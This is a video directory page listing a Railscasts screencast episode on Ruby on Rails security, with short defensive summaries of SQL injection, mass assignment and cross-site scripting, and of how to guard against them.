Categories

• Languages
• Platforms
• Applications
• Web Development
• Chat & Email
• Tools
• Others
• Database
• Graphics
• Security
• Open Source
• Methodology
• Networking
• Architecture

• About
• Contact us
• Suggest a Video
• Tag Cloud

Railscasts Week 9

Language :

English

Quality :

High

Has Audio :

true

Source :

showmedo

Media :

Flash

Let Ryan Bates take you through a growing series of great Rails tips.

Tags: Ruby On Rails, Ruby, Screencast, Showmedo, Web Development, Sql Injection, Cross Site Scripting, Hacking,     [SUGGEST  A  TAG]

Resources referenced in this screencast

Ruby on Rails

SQL Injection

Cross-site scripting

SQL Injection One of the most common security problems for dynamic sites is SQL Injection. Thankfully Rails does everything it can in solving this issue, but you still need to be aware of it.

Hackers Love Mass Assignment Your site may be at risk! When using mass assignment, you are giving the user complete control over that model and its associations. See how a hacker might use this vulnerability and learn how to stop it in this episode.

Cross Site Scripting Another common security issue is cross site scripting. In this episode you will see why it is so important to escape any HTML a user may submit.

Articles Realted to this Topic

[SUGGEST  A  ARTICLE]

Protecting against Cross Site Scripting (CSS/XSS) Many web applications use session cookies to track the requests of a user. The cookie is used to identify the request and connect it to the session data (@session in Rails). Usually the session contains a reference to the user that is currently logged in, e.g. the id of a User object

Protecting agsinst SQL Injection in Rails SQL Injection is the #1 security problem in many web applications. How does it work? If the web application includes strings from unreliable sources (usually form parameters) in SQL statements and doesn’t correctly quote any SQL meta characters like backslashes or single quotes, an attacker can change WHERE conditions in SQL statements, create records with invalid data or even execute arbitrary SQL statements.

Demonstrating the Consequences of Cross Site Scripting (XSS) Vulnerabilities High risk vulnerabilities such as SQL Injection can be easily demonstrated by security analysts to developers or business executives. For example, a xp_cmdshell request injected into an application vulnerable to SQL Injection can be used to demonstrate how an attacker can abuse SQL injection to obtain a command prompt from the host running the (Microsoft) SQL server. Such demonstrations have major visual impact and the consequences of the vulnerabilities are clear

Do not create records directly from form parameters If the attacker knows that the User model has an “admin” column, the newly created user will have administrator rights. One solution to this problem is, not to use mass-assignment and assign each value individually. Another solution is, to protect several properties so they can't be assigned using mass-assignment, but have to be set individually. The following line in your model will protect the “admin” attribute, i.e. it will be ignored during mass-assignment.

Creating records directly from form parameters Active Record provides two ways of securing sensitive attributes from being overwritten by malicious users that change the form. The first is attr_protected that denies mass-assignment the right to change the named parameters.